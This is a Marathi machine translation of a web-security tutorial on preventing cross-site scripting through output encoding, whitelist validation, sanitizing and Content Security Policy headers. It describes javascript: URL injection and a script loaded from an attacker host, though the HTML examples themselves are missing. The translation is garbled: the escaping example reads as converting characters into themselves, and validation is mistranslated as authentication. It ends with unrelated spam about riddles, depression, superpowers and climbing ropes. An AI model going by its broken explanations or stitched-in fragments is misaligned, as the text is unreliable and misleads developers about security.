• DOM मधील XSS हल्ल्यापासून संरक्षण करण्यासाठी, जेथे सर्व्हरला कधीही दुर्भावनापूर्ण स्ट्रिंग मिळत नाही (उदाहरणार्थ, आधी वर्णन केलेला अभिज्ञापक फ्रॅगमेंट हल्ला), क्लायंट-साइड कोडमध्ये सुरक्षित इनपुट हाताळणी करणे आवश्यक आहे. हे JavaScript सह केले जाते.

आता आम्ही स्पष्ट केले आहे की संदर्भ महत्त्वाचे का आहेत, इनकमिंग आणि आउटगोइंग इनपुट प्रोसेसिंगमधील फरक का महत्त्वाचा आहे आणि सुरक्षित इनपुट प्रक्रिया दोन्ही बाजूंनी, क्लायंटच्या बाजूने आणि सर्व्हरच्या बाजूने का केली जाणे आवश्यक आहे, आम्ही स्पष्ट करणे सुरू ठेवू शकतो, दोन प्रकारचे सुरक्षित इनपुट प्रोसेसिंग (एनकोडिंग आणि प्रमाणीकरण) प्रत्यक्षात कसे केले जाते.

एन्कोडिंग हा अशा परिस्थितीतून बाहेर पडण्याचा एक मार्ग आहे जिथे ब्राउझरसाठी वापरकर्ता इनपुटचा केवळ डेटा म्हणून अर्थ लावणे आवश्यक आहे, कोड नाही. वेब डेव्हलपमेंटमधील एन्कोडिंगचा सर्वात लोकप्रिय प्रकार म्हणजे एचटीएमएल एस्केपमेंट, जे वर्णांचे रूपांतर करते जसे की< и >व्ही< и >अनुक्रमे

खालील छद्म-कोड हे HTML एस्केपमेंट वापरून वापरकर्ता इनपुट (वापरकर्ता इनपुट) कसे एन्कोड केले जाऊ शकते आणि नंतर सर्व्हर-साइड स्क्रिप्ट वापरून पृष्ठामध्ये कसे समाविष्ट केले जाऊ शकते याचे एक उदाहरण आहे:

प्रिंट ""
"शेवटची टिप्पणी:" मुद्रित करा
प्रिंट एन्कोडएचटीएमएल(वापरकर्ता इनपुट)
प्रिंट ""

वापरकर्त्याने खालील ओळ प्रविष्ट केल्यास ... , परिणामी HTML असे दिसेल:

शेवटची टिप्पणी:
...

विशेष अर्थ असलेले सर्व वर्ण सुटलेले असल्यामुळे, ब्राउझर HTML सारख्या वापरकर्त्याच्या इनपुटचा कोणताही भाग पार्स करणार नाही.

क्लायंट-साइड एन्कोडिंग करताना, JavaScript नेहमी वापरला जातो, ज्यामध्ये अंगभूत फंक्शन्स असतात जी वेगवेगळ्या संदर्भांसाठी डेटा एन्कोड करतात.

तुमच्या सर्व्हर साइड कोडमध्ये कोडिंग करताना, तुम्ही तुमच्या भाषेत किंवा फ्रेमवर्कमध्ये उपलब्ध वैशिष्ट्यांवर अवलंबून आहात. मोठ्या संख्येने भाषा आणि फ्रेमवर्क उपलब्ध असल्यामुळे, हे ट्यूटोरियलकोणत्याही विशिष्ट सर्व्हर भाषा किंवा फ्रेमवर्कमध्ये कोडिंगचे तपशील समाविष्ट करणार नाही. तथापि, सर्व्हर साइड कोड लिहिताना क्लायंटच्या बाजूने वापरलेली JavaScript एन्कोडिंग वैशिष्ट्ये देखील वापरली जातात.

JavaScript सह क्लायंट-साइड वापरकर्ता इनपुट एन्कोड करताना, अनेक अंगभूत पद्धती आणि गुणधर्म आहेत जे सर्व डेटा स्वयंचलितपणे संदर्भ-संवेदनशील शैलीमध्ये एन्कोड करतात:

वर नमूद केलेला शेवटचा संदर्भ (जावास्क्रिप्टमधील मूल्ये) या सूचीमध्ये समाविष्ट केलेला नाही कारण JavaScript डेटा एन्कोड करण्याचा अंगभूत मार्ग प्रदान करत नाही जो JavaScript स्त्रोत कोडमध्ये समाविष्ट केला जाईल.

एन्कोडिंग करतानाही, काही संदर्भांमध्ये दुर्भावनायुक्त स्ट्रिंग वापरणे शक्य आहे. याचे मुख्य उदाहरण म्हणजे जेव्हा वापरकर्ता इनपुटचा वापर URL प्रदान करण्यासाठी केला जातो, जसे की खालील उदाहरणात:

document.querySelector("a").href = userInput

जरी घटकाच्या href मालमत्तेमध्ये निर्दिष्ट मूल्य स्वयंचलितपणे ते एन्कोड करते जेणेकरून ते गुणधर्माच्या मूल्यापेक्षा अधिक काही बनत नाही, परंतु हे केवळ आक्रमणकर्त्याला "javascript:" ने सुरू होणारी URL समाविष्ट करण्यापासून प्रतिबंधित करत नाही. दुव्यावर क्लिक केल्यावर, बांधकाम काहीही असो, URL मध्ये एम्बेड केलेली JavaScript कार्यान्वित केली जाईल.

जेव्हा तुम्ही वापरकर्त्यांना पृष्ठावरील HTML कोडचा भाग वापरण्यास सक्षम व्हावे असे तुम्हाला वाटते तेव्हा एन्कोडिंग हा एक कार्यक्षम उपाय नाही. एक उदाहरण एक वापरकर्ता प्रोफाइल पृष्ठ असेल जेथे वापरकर्ता सानुकूल HTML वापरू शकतो. जर हा साधा HTML एन्कोड केलेला असेल, तर प्रोफाइल पेजमध्ये फक्त साधा मजकूर असू शकतो.

यासारख्या परिस्थितींमध्ये, कोडिंग हे प्रमाणीकरणाद्वारे पूरक असणे आवश्यक आहे, जे आम्ही पुढे पाहू.

प्रमाणीकरण ही वापरकर्ता इनपुट फिल्टर करण्याची क्रिया आहे जेणेकरून त्यातील सर्व दुर्भावनापूर्ण भाग त्यातील सर्व कोड न काढता काढले जातील. वेब डेव्हलपमेंटमध्ये प्रमाणीकरणाचा सर्वात वापरल्या जाणार्‍या प्रकारांपैकी एक काही HTML घटकांना (जसे की आणि ) परवानगी देतो परंतु इतरांना परवानगी देतो (जसे की ).

दोन मुख्य वैशिष्ट्यपूर्ण तपासणी आहेत जी त्यांच्या अंमलबजावणीमध्ये भिन्न आहेत:

वर्गीकरण धोरण वापरकर्ता इनपुट काळ्या सूची किंवा श्वेतसूची वापरून वर्गीकृत केले जाऊ शकते. प्रमाणीकरण परिणाम दुर्भावनापूर्ण म्हणून ओळखले जाणारे वापरकर्ता इनपुट नाकारले किंवा स्वच्छ केले जाऊ शकते.

सहजतेने, वापरकर्त्याच्या इनपुटमध्ये दिसू नये असा निषिद्ध नमुना परिभाषित करून तपासणी करणे योग्य वाटते. जर एखादी स्ट्रिंग या पॅटर्नशी जुळत असेल, तर ती अवैध म्हणून चिन्हांकित केली जाईल. उदाहरणार्थ, वापरकर्त्यांना जावास्क्रिप्ट वगळता कोणत्याही प्रोटोकॉलसह सानुकूल URL सबमिट करण्यास अनुमती द्या: . या वर्गीकरण धोरण म्हणतात काळी यादी.

तथापि, काळ्या सूचीमध्ये दोन मुख्य तोटे आहेत:

सर्व संभाव्य दुर्भावनापूर्ण स्ट्रिंग्सच्या संचाचे अचूक वर्णन करण्याची अडचण सहसा खूप कठीण काम असते. वरील धोरण उदाहरण फक्त सबस्ट्रिंग " javascript" शोधून यशस्वीरित्या अंमलात आणले जाऊ शकत नाही कारण ते " Javascript: " (जेथे पहिले अक्षर अप्परकेसमध्ये आहे) आणि " javascript: " (जेथे पहिले अक्षर अंकीय म्हणून एन्कोड केलेले आहे) सारख्या स्ट्रिंग्स चुकतील. वर्ण संदर्भ). अप्रचलितपणा जरी एक आदर्श काळी यादी विकसित केली गेली असली तरीही, ब्राउझरमध्ये जोडलेले नवीन वैशिष्ट्य आक्रमण करण्यासाठी वापरले जाऊ शकते तर ते निरुपयोगी ठरेल. उदाहरणार्थ, HTML व्हॅलिडेशनसाठी ब्लॅकलिस्ट HTML5 मध्ये ऑनमाउसव्हील विशेषता सादर करण्यापूर्वी विकसित केली असल्यास, ती (ब्लॅकलिस्ट) आक्रमणकर्त्याला XSS हल्ला करण्यासाठी ही विशेषता वापरण्यापासून रोखू शकणार नाही. ही कमतरता वेब डेव्हलपमेंटमध्ये विशेषत: महत्वाची आहे, ज्यामध्ये बर्याच भिन्न तंत्रज्ञानाचा समावेश आहे ज्या सतत अद्यतनित केल्या जातात.

या उणिवांमुळे, वर्गीकरण धोरण म्हणून ब्लॅकलिस्टिंगला जोरदारपणे परावृत्त केले जाते. व्हाईटलिस्टिंग हा सामान्यतः अधिक सुरक्षित दृष्टीकोन आहे, ज्याचे आम्ही पुढे वर्णन करू.

पांढरी यादीमूलत: ब्लॅकलिस्टिंगच्या विरुद्ध: निषिद्ध पॅटर्न निर्दिष्ट करण्याऐवजी, व्हाइटलिस्टिंग दृष्टीकोन अनुमत पॅटर्न परिभाषित करते आणि इनपुट असल्यास अवैध म्हणून चिन्हांकित करते जुळत नाहीहा टेम्पलेट.

ब्लॅकलिस्टच्या विपरीत, श्वेतसूचीचे उदाहरण म्हणजे वापरकर्त्यांना फक्त http: आणि https: प्रोटोकॉल असलेले सानुकूल URL सबमिट करण्याची परवानगी देणे, आणखी काही नाही. जर URL मध्ये javascript: प्रोटोकॉल असेल तर हा दृष्टिकोन आपोआप अवैध म्हणून चिन्हांकित करेल, जरी ती " Javascript: " किंवा " javascript: " म्हणून सादर केली असली तरीही.

ब्लॅकलिस्टिंगच्या तुलनेत, व्हाइटलिस्टिंगचे दोन मुख्य फायदे आहेत:

साधेपणा सुरक्षित स्ट्रिंग्सच्या संचाचे अचूक वर्णन करणे हे सर्व दुर्भावनापूर्ण स्ट्रिंग्सच्या संचाला ओळखण्यापेक्षा बरेच सोपे आहे. हे विशेषतः सामान्य परिस्थितींमध्ये लागू होते जेथे वापरकर्ता इनपुटमध्ये ब्राउझरमध्ये उपलब्ध कार्यक्षमतेचा एक अतिशय मर्यादित संच समाविष्ट असणे आवश्यक आहे. उदाहरणार्थ, वर वर्णन केलेली श्वेतसूची फक्त परवानगी असलेल्या http: किंवा https: प्रोटोकॉलसह URL वापरण्याची परवानगी देते आणि बहुतेक परिस्थितींमध्ये हे वापरकर्त्यांसाठी पुरेसे असते. टिकाऊपणा ब्लॅकलिस्टच्या विपरीत, जेव्हा ब्राउझरमध्ये नवीन वैशिष्ट्य जोडले जाते तेव्हा श्वेतसूची सहसा अप्रचलित होत नाही. उदाहरणार्थ, HTML श्वेतसूची प्रमाणीकरण केवळ HTML घटकांच्या शीर्षक विशेषतांना सुरक्षित ठेवण्यास अनुमती देते, जरी ती (श्वेतसूची) HTML5 onmousewheel विशेषता सादर करण्यापूर्वी डिझाइन केलेली असली तरीही.

जेव्हा वापरकर्ता इनपुट अवैध (निषिद्ध) म्हणून चिन्हांकित केले जाते, तेव्हा दोनपैकी एक क्रिया केली जाऊ शकते:

इनपुट नाकारणे फक्त नाकारले जाते, ते साइटवर इतरत्र वापरले जाण्यापासून प्रतिबंधित करते. निर्जंतुकीकरणाने इनपुट डेटाचे सर्व अवैध भाग काढून टाकले जातात आणि उर्वरित इनपुट नेहमीप्रमाणे वेबसाइटवर वापरले जातात.

दोनपैकी, "विचलन" हा अंमलात आणण्याचा सर्वात सोपा मार्ग आहे. परंतु निर्जंतुकीकरण अधिक उपयुक्त मानले जाते कारण ते वापरकर्त्यासाठी इनपुटची विस्तृत श्रेणी प्रदान करते. उदाहरणार्थ, वापरकर्त्याने क्रेडिट कार्ड नंबर सबमिट केल्यास, सॅनिटाइझिंग सर्व वर्ण नसलेले काढून टाकेल आणि कोड इंजेक्शनला प्रतिबंध करेल, तसेच वापरकर्त्याला हायफनसह किंवा त्याशिवाय नंबर प्रविष्ट करण्यास अनुमती देईल.

आपण निर्जंतुकीकरण लागू करण्याचा निर्णय घेतल्यास, आपल्याला याची खात्री करणे आवश्यक आहे की निर्जंतुकीकरण प्रक्रिया स्वतःच ब्लॅकलिस्ट पद्धतीचा वापर करत नाही. उदाहरणार्थ, URL "Javascript:...", जरी अवैध म्हणून श्वेतसूचीबद्ध केली असली तरी, निर्जंतुकीकरण दिनचर्या बायपास करेल जी "javascript:" ची सर्व उदाहरणे काढून टाकते. या कारणास्तव, चांगल्या-चाचणी केलेल्या लायब्ररी आणि फ्रेमवर्कने जेव्हा शक्य असेल तेव्हा सॅनिटायझिंगचा वापर केला पाहिजे.

एन्कोडिंग XSS हल्ल्यांपासून बचावाची तुमची पहिली ओळ असावी, त्याचा उद्देश डेटावर अशा प्रकारे प्रक्रिया करणे आहे की ब्राउझर वापरकर्त्याच्या इनपुटचा कोड म्हणून अर्थ लावू शकत नाही. काही प्रकरणांमध्ये, कोडिंग प्रमाणीकरणाद्वारे पूरक असणे आवश्यक आहे. एन्कोडिंग आणि प्रमाणीकरण आउटगोइंग ट्रॅफिकवर लागू केले जाणे आवश्यक आहे, कारण तेव्हाच तुम्हाला हे कळू शकते की वापरकर्ता इनपुट कोणत्या संदर्भात लागू केला जाईल आणि कोणते एन्कोडिंग आणि प्रमाणीकरण लागू केले जावे.

संरक्षणाची दुसरी ओळ म्हणून, तुम्ही javascript: protocol वापरून येणार्‍या डेटावर उघडपणे अवैध वापरकर्ता इनपुट, जसे की लिंक्स, स्वच्छ करा किंवा नाकारल्या पाहिजेत. हे स्वतःच संपूर्ण सुरक्षा प्रदान करू शकत नाही, परंतु चुकीच्या अंमलबजावणीमुळे कोडिंग आणि प्रमाणीकरण संरक्षणातील कोणताही मुद्दा अयशस्वी होण्याची शक्यता असल्यास ही एक उपयुक्त खबरदारी आहे.

संरक्षणाच्या या दोन ओळी सातत्याने वापरल्या गेल्यास, तुमची साइट XSS हल्ल्यांपासून संरक्षित केली जाईल. तथापि, वेबसाइट तयार करणे आणि देखरेख करण्याच्या जटिलतेमुळे, केवळ वापरकर्ता इनपुटचे सुरक्षित हाताळणी वापरून संपूर्ण संरक्षण प्रदान करणे कठीण होऊ शकते. संरक्षणाची तिसरी ओळ म्हणून, तुम्ही सामग्री सुरक्षा धोरणे ( इंग्रजी सामग्री सुरक्षा धोरण), नंतर CSP, ज्याचे आम्ही पुढे वर्णन करू.

XSS हल्ल्यांपासून संरक्षण करण्यासाठी केवळ सुरक्षित वापरकर्ता इनपुट हाताळणी वापरणे पुरेसे नाही, कारण एक सुरक्षा त्रुटी देखील आपल्या वेबसाइटला धोक्यात आणू शकते. नवीन वेब मानकांच्या सामग्री सुरक्षा धोरणांचा (CSP) वापर हा धोका कमी करू शकतो.

CSPs चा वापर ब्राउझरच्या वेब पृष्ठाच्या वापरावर प्रतिबंध करण्यासाठी केला जातो जेणेकरून ते केवळ विश्वसनीय स्त्रोतांकडून डाउनलोड केलेली संसाधने वापरू शकेल. ए संसाधनेस्क्रिप्ट, शैली पत्रके, प्रतिमा किंवा पृष्ठावर संदर्भित असलेल्या इतर कोणत्याही प्रकारच्या फाइल आहेत. याचा अर्थ असा की आक्रमणकर्त्याने आपल्या साइटवर दुर्भावनापूर्ण सामग्री इंजेक्ट करणे व्यवस्थापित केले तरीही, CSP त्याची अंमलबजावणी रोखू शकेल.

खालील नियमांची अंमलबजावणी करण्यासाठी CSPs वापरले जाऊ शकतात:

अविश्वासू स्रोत प्रतिबंधित करा बाह्य संसाधने केवळ चांगल्या-परिभाषित विश्वसनीय स्त्रोतांच्या संचावरून डाउनलोड केली जाऊ शकतात. एम्बेडेड संसाधने इनलाइन JavaScript आणि CSS ला अनुमती दिली जाणार नाही. eval अक्षम करा JavaScript मध्ये eval फंक्शनचा वापर अक्षम करा.

खालील उदाहरणामध्ये, आक्रमणकर्त्याने वेब पृष्ठावर दुर्भावनापूर्ण कोड इंजेक्ट करण्यात व्यवस्थापित केले:

शेवटची टिप्पणी:

योग्यरित्या परिभाषित CSP धोरणासह, ब्राउझर दुर्भावनापूर्ण-script.js लोड आणि कार्यान्वित करू शकत नाही कारण http://attacker/ विश्वसनीय स्रोत म्हणून सूचीबद्ध नाही. जरी साइट वापरकर्ता इनपुटवर विश्वासार्हपणे प्रक्रिया करण्यात अक्षम होती, तरीही या प्रकरणात, CSP धोरणाने असुरक्षिततेला कोणतेही नुकसान होण्यापासून प्रतिबंधित केले.

जरी आक्रमणकर्त्याने स्क्रिप्ट कोडमध्ये कोड इंजेक्ट केला, आणि बाह्य फाईलचा दुवा नसला तरीही, योग्यरित्या कॉन्फिगर केलेले CSP धोरण JavaScript कोडमध्ये इंजेक्शन देण्यास प्रतिबंध करेल, असुरक्षितता टाळेल आणि कोणतीही हानी होण्यास प्रतिबंध करेल.

डीफॉल्टनुसार, ब्राउझर CSP वापरत नाहीत. तुमच्या वेबसाइटवर SCP सक्षम करण्यासाठी, पृष्ठांमध्ये अतिरिक्त HTTP शीर्षलेख असणे आवश्यक आहे: सामग्री-सुरक्षा-धोरण. हे शीर्षलेख असलेले कोणतेही पृष्ठ ब्राउझरद्वारे लोड केल्यावर सुरक्षा धोरणे लागू करेल, जर ब्राउझर CSP ला समर्थन देत असेल.

सुरक्षा धोरण प्रत्येक HTTP प्रतिसादासह पाठवले जात असल्याने, सर्व्हरला प्रत्येक पृष्ठासाठी स्वतंत्रपणे धोरण सेट करणे शक्य आहे. प्रत्येक प्रतिसादात समान CSP शीर्षलेख टाकून संपूर्ण वेबसाइटवर समान धोरण लागू केले जाऊ शकते.

सामग्री-सुरक्षा-धोरण शीर्षलेखातील मूल्यामध्ये एक स्ट्रिंग आहे जी एक किंवा अधिक सुरक्षा धोरणे निर्दिष्ट करते जी आपल्या साइटवर कार्य करतील. या ओळीचे वाक्यरचना पुढे वर्णन केले जाईल.

या विभागातील शीर्षलेख उदाहरणे वाचन सुलभतेसाठी लाइन ब्रेक आणि इंडेंटेशन वापरतात; ते वास्तविक शीर्षलेखात उपस्थित नसावेत.

CSP शीर्षलेख वाक्यरचना खालीलप्रमाणे आहे:

सामग्री-सुरक्षा-धोरण:
निर्देश स्रोत-अभिव्यक्ती, स्रोत-अभिव्यक्ती, ...;
निर्देश ...;
...

या वाक्यरचनामध्ये दोन घटक असतात:

• निर्देश, दिलेल्या सूचीमधून घेतलेल्या संसाधनाचा प्रकार दर्शविणारी स्ट्रिंग आहेत.
• स्त्रोत अभिव्यक्ती हे एक मॉडेल आहे जे एक किंवा अधिक सर्व्हरचे वर्णन करते ज्यामधून संसाधने लोड केली जाऊ शकतात.

प्रत्येक निर्देशासाठी, स्त्रोत अभिव्यक्तीमधील डेटा निर्धारित करतो की त्या प्रकारच्या संसाधने लोड करण्यासाठी कोणते स्त्रोत वापरले जाऊ शकतात.

CSP हेडरमध्ये खालील निर्देश वापरले जाऊ शकतात:

• कनेक्ट-src
• फॉन्ट-src
• फ्रेम-src
• img-src
• media-src
• ऑब्जेक्ट-src
• स्क्रिप्ट-src
• शैली-src

या व्यतिरिक्त, हेडरमध्ये समाविष्ट नसलेल्या सर्व निर्देशांसाठी डीफॉल्ट मूल्य प्रदान करण्यासाठी विशेष डीफॉल्ट-एसआरसी निर्देश वापरला जाऊ शकतो.

स्रोत अभिव्यक्ती तयार करण्यासाठी वाक्यरचना खालीलप्रमाणे आहे:

protocol:// host-name: port-number

होस्टनाव * ने सुरू होऊ शकते, याचा अर्थ प्रदान केलेल्या होस्टनावाच्या कोणत्याही सबडोमेनला परवानगी दिली जाईल. त्याचप्रमाणे, एक पोर्ट क्रमांक * म्हणून दर्शविला जाऊ शकतो, ज्याचा अर्थ असा की सर्व पोर्ट्सना परवानगी दिली जाईल. याव्यतिरिक्त, प्रोटोकॉल आणि पोर्ट क्रमांक वगळला जाऊ शकतो. कोणताही प्रोटोकॉल निर्दिष्ट न केल्यास, धोरणास HTTPS वापरून सर्व संसाधने लोड करणे आवश्यक असेल.

वरील वाक्यरचना व्यतिरिक्त, स्त्रोत अभिव्यक्ती वैकल्पिकरित्या विशेष अर्थ असलेल्या चार कीवर्डपैकी एक असू शकते (कोट समाविष्ट):

"काहीही नाही" संसाधने अक्षम करते. "स्वत:" वेब पृष्ठ जेथे राहतो त्या होस्टकडील संसाधनांचे निराकरण करते. "असुरक्षित-इनलाइन" पृष्ठावर इनलाइन घटक, घटक आणि जावास्क्रिप्ट: URL म्हणून समाविष्ट असलेल्या संसाधनांना अनुमती देते. "unsafe-eval" JavaScript eval फंक्शन सक्षम करते.

लक्षात ठेवा की जेव्हाही CSP वापरला जातो, तेव्हा एम्बेडेड संसाधने आणि eval स्वयंचलितपणे डीफॉल्टनुसार अक्षम केले जातात. "असुरक्षित-इनलाइन" आणि "असुरक्षित-इव्हल" वापरणे हा त्यांचा वापर करण्याचा एकमेव मार्ग आहे.

सामग्री-सुरक्षा-धोरण:
script-src "self" scripts.example.com;
media-src "काहीही नाही";
img‑src*;
default-src "self" http://*.example.com

या उदाहरण धोरणासह, वेब पृष्ठावर खालील निर्बंध असतील:

• स्क्रिप्ट फक्त वेब पेज असलेल्या होस्टवरून आणि या पत्त्यावरून डाउनलोड केल्या जाऊ शकतात: scripts.example.com.
• ऑडिओ आणि व्हिडिओ फाइल्स अपलोड करण्याची परवानगी नाही.
• प्रतिमा फाइल्स कोणत्याही पत्त्यावरून डाउनलोड केल्या जाऊ शकतात.
• इतर सर्व संसाधने केवळ वेब पृष्ठ असलेल्या होस्टवरून आणि example.com च्या कोणत्याही सबडोमेनवरून डाउनलोड केली जाऊ शकतात.

जून 2013 पर्यंत, W3C द्वारे सामग्री सुरक्षा धोरणांची शिफारस केली आहे. CSP ब्राउझर डेव्हलपरद्वारे लागू केले जाते, परंतु त्यातील काही भाग भिन्न ब्राउझरसाठी विशिष्ट आहेत. उदाहरणार्थ, HTTP हेडरचा वापर ब्राउझरमध्ये भिन्न असू शकतो. CSP वापरण्यापूर्वी, कृपया तुम्ही समर्थन करू इच्छित असलेल्या ब्राउझरच्या कागदपत्रांचा संदर्भ घ्या.

• XSS हल्ला हा वापरकर्ता इनपुटच्या असुरक्षित हाताळणीमुळे शक्य झालेला कोड इंजेक्शन हल्ला आहे.
• यशस्वी XSS हल्ला आक्रमणकर्त्याला पीडिताच्या ब्राउझरमध्ये दुर्भावनापूर्ण JavaScript कार्यान्वित करण्यास अनुमती देतो.
• यशस्वी XSS हल्ला वेबसाइट आणि तिच्या वापरकर्त्यांच्या सुरक्षिततेशी तडजोड करतो.

• XSS हल्ल्यांचे तीन मुख्य प्रकार आहेत:
  • संचयित XSS, जिथे दुर्भावनापूर्ण इनपुट वेबसाइटच्या डेटाबेसमधून उद्भवते.
  • परावर्तित XSS, जिथे दुर्भावनापूर्ण इनपुट पीडिताच्या विनंतीवरून उद्भवते.
  • DOM मॉडेलमध्ये XSS हल्ला, जेथे असुरक्षा क्लायंट-साइड कोडमध्ये वापरली जाते, सर्व्हर-साइडवर नाही.
• हे सर्व हल्ले वेगळ्या पद्धतीने केले जातात, परंतु यशस्वी झाल्यास समान प्रभाव पडतो.

• XSS हल्ले रोखण्याचा सर्वात महत्वाचा मार्ग म्हणजे सुरक्षित इनपुट हाताळणी करणे.
  • जेव्हा पृष्ठावर वापरकर्ता इनपुट सक्षम केले जाते तेव्हा एन्कोडिंग करणे आवश्यक आहे.
  • काही प्रकरणांमध्ये, कोडिंग पुनर्स्थित करणे किंवा प्रमाणीकरणाद्वारे पूरक असणे आवश्यक आहे.
  • सुरक्षित इनपुट हाताळणीने वापरकर्ता इनपुट कोणत्या पृष्ठ संदर्भामध्ये समाविष्ट केले जात आहे हे लक्षात घेतले पाहिजे.
  • सर्व प्रकारचे XSS हल्ले रोखण्यासाठी, क्लायंट आणि सर्व्हर साइड कोड दोन्हीमध्ये सुरक्षित इनपुट हाताळणी करणे आवश्यक आहे.
• सामग्री सुरक्षा धोरणे (CSPs) सुरक्षित इनपुट प्रक्रिया अयशस्वी झाल्यास संरक्षणाचा अतिरिक्त स्तर प्रदान करतात.

हे लक्षात घेतले पाहिजे की XSS चे वर्णन करण्यासाठी वापरल्या जाणार्‍या शब्दावलीमध्ये एक क्रॉसओवर आहे: DOM वर XSS हल्ला एकतर संग्रहित किंवा प्रतिबिंबित केला जाऊ शकतो; हे स्वतंत्र प्रकारचे हल्ले नाहीत. मिश्रण न करता सर्व प्रकारच्या XSS कव्हर करणारी कोणतीही सामान्यतः स्वीकारलेली शब्दावली नाही. XSS चे वर्णन करण्यासाठी वापरल्या जाणार्‍या शब्दावलीची पर्वा न करता, सर्वात महत्वाची गोष्ट म्हणजे हल्ल्याचा प्रकार निर्धारित करणे, दुर्भावनापूर्ण इनपुट कोठून येते आणि असुरक्षा कोठे आहे हे आपल्याला माहित असल्यास हे शक्य आहे.

साठी स्त्रोत कोड एक्‍सेसएक्सएसएस GitHub वर उपलब्ध आहे.

एक्‍सेसएक्सएसएस 2013 मध्ये चाल्मर्स युनिव्हर्सिटी ऑफ टेक्नॉलॉजी येथे भाषा-आधारित सुरक्षा अभ्यासक्रमाचा भाग म्हणून तयार केले गेले.

रशियन भाषेत भाषांतर A888R द्वारे केले गेले, मूळ मजकूर इंग्रजीमध्ये: excess-xss.com, टिप्पण्या, सूचना आणि भाषांतर त्रुटी येथे पाठवा.

लेख द्वारेविषय:

प्राण्यांबद्दल मुलांसाठी अवघड युक्ती कोडे युक्ती असलेले कोडे हे काही सामान्य मुलांचे कोडे नाहीत. या काव्यात्मक क्वाट्रेन अशा मुलांमध्ये खूप लोकप्रिय आहेत ज्यांना अशा कोडी खेळाचे नियम आधीच समजतात आणि त्यांना विनोदाची भावना आहे. गोष्ट अशी आहे की कोड्याचे उत्तर यमक नाही, परंतु प्रत्यक्षात	मांजरी हृदयावर ओरखडे तेव्हा काय करावे? डॉक्टर एलेना करबान: "वनगिन्स ब्लूज" जर तुम्ही एखाद्या गोष्टीने किंवा एखाद्याच्याशी वाहून गेलात तर बरा होऊ शकतो. उदासीनता, प्लीहा, प्लीहा - जेव्हा एखाद्या व्यक्तीला भावना नसतात तेव्हा राज्याला कोणती नावे दिली जात नाहीत, जेव्हा तो प्रत्येक गोष्टीबद्दल उदासीन होतो, कामात रस गमावतो
घरी सुपरपॉवर कसे शोधायचे आणि विकसित कसे करावे अलौकिक कसे बनायचे अलौकिक क्षमता केवळ जन्माच्या वेळीच वारशाने मिळत नाही तर स्वतंत्रपणे विकसित देखील होऊ शकते. अनेक मानसशास्त्रज्ञ त्यांच्या उदाहरणाद्वारे या माहितीची पुष्टी करतात. जेणेकरुन प्रत्येकाला समजेल की त्याच्याकडे आहे का, आपण फक्त काही प्रयत्न करणे आवश्यक आहे	डेझी चेन: हा कोणत्या प्रकारचा प्राणी आहे? सेल्फ-बेलेइंग ही केवळ पर्वतारोहणातील एक टीम नाही तर... सेल्फ-बेलेइंग देखील आहे. ते भिन्न आहेत, आणि जेणेकरून एक किंवा दुसरे कसे वापरावे याबद्दल आपण गोंधळात पडू नये, आम्ही प्रत्येक गोष्टीचे विश्लेषण करू मुख्य गोष्ट लक्षात ठेवा - सर्वात सुरक्षित आणि सर्वात विश्वासार्ह डोरी हा मुख्य दोरीचा तुकडा आहे.